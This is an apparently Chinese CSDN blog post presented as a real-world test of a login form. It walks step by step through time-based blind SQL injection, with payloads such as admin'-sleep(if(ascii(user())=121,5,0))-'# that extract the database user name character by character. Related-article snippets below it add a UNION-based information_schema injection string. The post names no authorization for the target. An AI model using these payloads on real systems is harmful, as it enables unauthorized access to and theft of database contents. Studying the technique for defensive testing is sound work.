记一次实战中sql注入——一个登录框怎么测试?

最新推荐文章于 2024-08-15 19:53:17 发布
最新推荐文章于 2024-08-15 19:53:17 发布
阅读量183 收藏 2
点赞数 1
文章标签: web安全 安全 网教盟 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A19911511842/article/details/141221813
版权

一个登录框怎么测试?

测试步骤:

1、首先查找注入点:

在登录页面的账户输入admin’密码随便输,返回如下图

但是我输入admin’’ 密码随便,返回的又不一样

所以我先去bp里面抓包试验一下

用sleep()函数实验一下,看能不能触发这个sleep函数

果然它睡了五秒

Payload:admin'-sleep(5)-'

所以更加确定这个地方是有注入点的

那么接下来构造基本的轮子:

Payload:

admin '-sleep(if(1=1,5,0))-'#

在sleep()函数里面加一个if语句,就是说1=1那个表达式中,如果为真就返回5,否则就返回0

这一次也是停了5秒才显示出来的

继续构造poc

Payload:

admin '-sleep(if(user()!='a',10,0))-'#

利用user()获取当前用户,因为我不知道具体是哪个字符,所以只有加个感叹号才能说明这个语句为真,才会返回5,所以这次也是隔了五秒,raw才显示出来

继续构造poc

Payload:

a '-sleep(if(ascii(user())=1,10,0))-'#

所以我直接用ascii()函数将user()转换成ascii码进行爆破

出现了两个ascii码

所以试一下哪个是的

经过测验,发现121才会睡5秒,122没有睡

admin '-sleep(if(ascii(user())=121,5,0))-'#

admin '-sleep(if(ascii(user())=122,5,0))-'#

所以查ascii表发现

121对应字母y

然后来利用截取函数就可以跑出全部数据了

方班网安人才教育服务中心
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 4615
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
一次挖取学校edusrc——SQL注入
CC__Faker的博客
06-07 5116
前言 这次漏洞发现其实并不是刻意去扫描挖掘的,当时是百度搜了下学校站点,查到本校的继续教育学院,里面有个录取结果查询模块。随手测了几句sql发现竟然报错了,于是开始对漏洞危害的验证。 0x00 测试工具 burpsuite sqlmap 0x01注点判断 常规and 1=1 ,1=2试试,网页正常反馈。 尝试让页面报错。 没想到出现了回显信息,回显信息还打印了sql语句,网站目录等信息。 1)SQL语句为”SELECT * FROM baoming_list WHERE shenfenzhengh
靶场实战——SQL注入(第一关)
weixin_58666006的博客
07-25 401
id=1 union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME = 'admin' and TABLE_SCHEMA='maoshe' LIMIT 1,1 -- -id=1 union select 1,database() LIMIT 1,1 -- -输入payload:payload:http://pu2lh35s.ia.aqlab.cn/?
【渗透测试实战】具体案例——SQL注入攻击是怎么回事?
baidu_31295661的博客
03-07 213
写在前面 1、 网站分析 2、初步探测 3、注入sql测试 4、获取查询长度 5、获取数据库相关信息 6、通过注入,我们拿到了数据库的初步信息 作为一个防御型小白帽 你一定要知道进攻套路 才能有相应的防御措施 声明:只做测试,发现对方的漏洞,并不进行破坏性操作 1、 网站分析 地址:http://www.xxx.com.tw/ 这是一家国TW地区的网站,看着满屏的繁体字,就不是很舒服 网站首页包括:关于我们、资料下载、联络方式等等。 这些对我们进行sql注入用处并不大 我..
一个自学Java的小项目——学生信息管理系统.zip
03-05
【标题】"一个自学Java的小项目——学生信息管理系统"是一个非常适合初学者的编程实践项目,主要使用Java语言来实现。这个系统旨在管理学生的基本信息,是学习Java编程、数据库操作以及系统设计的一个理想起点。 ...
Java毕业设计——基于ssm架的大学社团管理系统(源码+sql)
03-01
1. **Spring架**:Spring是一个全面的后端应用开发架,它提供了依赖注入(DI)和面向切面编程(AOP)等功能,用于管理对象的生命周期和行为。在本系统,Spring主要负责业务逻辑的处理,通过Bean工厂和IoC容器...
千里之堤,溃于蚁穴——揭密SQL注入攻击——初识SQL注入
06-26
### 千里之堤,溃于蚁穴——揭密SQL注入攻击 #### 一、SQL注入漏洞与攻击 SQL注入(SQL Injection)是一种常见的安全漏洞,它发生在应用程序没有正确处理用户输入的情况下,允许攻击者通过恶意构造的SQL语句来操控...
SQL注入大餐必备餐具SQLMA
11-06
通过以上介绍,我们可以看到SQLmap不仅是一个强大的SQL注入工具,而且对于渗透测试人员来说也是一个必不可少的利器。熟练掌握SQLmap的使用方法,可以帮助安全研究人员更高效地发现并修复潜在的安全漏洞。同时,了解...
ssm实战项目——超市订单管理系统
11-16
总的来说,"ssm实战项目——超市订单管理系统"是一个综合性的学习资源,涵盖了SSM架的各个核心组件,有助于开发者提升Java Web开发技能,理解企业级应用的开发流程和最佳实践。实践遇到的问题和解决方法,...
怎么在网络攻击屹立不倒
dexun123的博客
08-12 626
在当今蓬勃发展的网络游戏产业,服务器安全无疑是企业生存与发展的基石。面对互联网环境无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 113
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘查询语法也能方便查看语法,渗透不二之选。
Animetronic - hackmyvm
tanbinn的博客
08-12 439
hackmyvm的Animetronic靶场
安全入门day.02
mxxcxy的博客
08-14 590
这里使用小皮面板部署网页(1)点击安装程序开始安装,在自定义选项修改安装位置,根据自己实际安装位置设定,作者这里安装在C盘作为演示(2)点击立即安装,等待进度条走完(3)点击安装完成执行程序(4)如果出现以下界面就是安装成功了(5)根据设定的软件安装位置,部署网站,软件根目录下面有3个文件夹,第一个COM文件夹是小皮面板的配置文件,第二个Extensions文件夹是存放已经安装的软件环境,例如php、mysql和Apache等;
人工智能在网络安全威胁测试的应用:LLMs如何改变网络威胁格局
python12222_的博客
08-12 667
本文通过初步探索和实验验证了LLMs在网络安全威胁测试的应用潜力。我们发现LLMs能够自动化决策过程,提供高质量的响应,并在一定程度上提升防御系统的能力。然而,我们也意识到LLMs技术的滥用风险和对未来网络安全威胁格局的潜在影响。未来的研究需要进一步探讨LLMs在更复杂网络环境的应用能力,以及如何负责任地使用这些技术来增强网络安全。通过本文的研究,我们希望能够激发更多关于LLMs在网络安全应用的讨论和研究,推动该领域的发展,并为未来的网络安全防护提供新的思路和方法。​。
网络安全】密码重置毒实现账户接管
等风来
08-15 18
我输入了新密码,点击“重置密码”。然后,我被导航到登录页面,在那里我输入了电子邮件和新密码,最后成功登录了账户,说明此漏洞是有效的。
Azure与Google Cloud Platform(GCP)的云安全策略与最佳实践(第二篇)
艰难的活着
08-12 1014
然而,理解这些平台的独特之处,并实施相应的安全策略,是确保云环境安全的关键。通过结合这些最佳实践和代码示例,用户可以有效提升其在Azure和GCP上的安全水平。Azure负责物理层和基础设施的安全,而用户负责虚拟机、应用、数据及其权限的管理和安全。GCP提供默认的服务器端加密,用户也可以选择客户管理的加密密钥(CMEK)。GCP的共享责任模型类似于AWS和Azure,GCP负责基础设施的安全,用户负责其使用的服务、数据和访问控制的安全。GCP的KMS服务允许用户创建、管理加密密钥,并与其他GCP服务集成。
DC-4靶机渗透测试
weixin_58786230的博客
08-14 127
【代码】DC-4靶机渗透测试
阿一网络安全实战演练之利用 REST URL 的服务器端参数污染
最新发布
Ayixy的博客
08-15 422
3. 将 username 参数的值从 administrator%3F 改为 ./administrator,然后发送请求。4. 将 username 参数的值从 ./administrator 改为 ../administrator,然后发送请求。这表明请求可能访问了一个无效的 URL 路径。2、 在 Proxy > HTTP history ,注意到 POST /forgot-password 请求和相关的 /static/js/forgotPassword.js JavaScript 文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值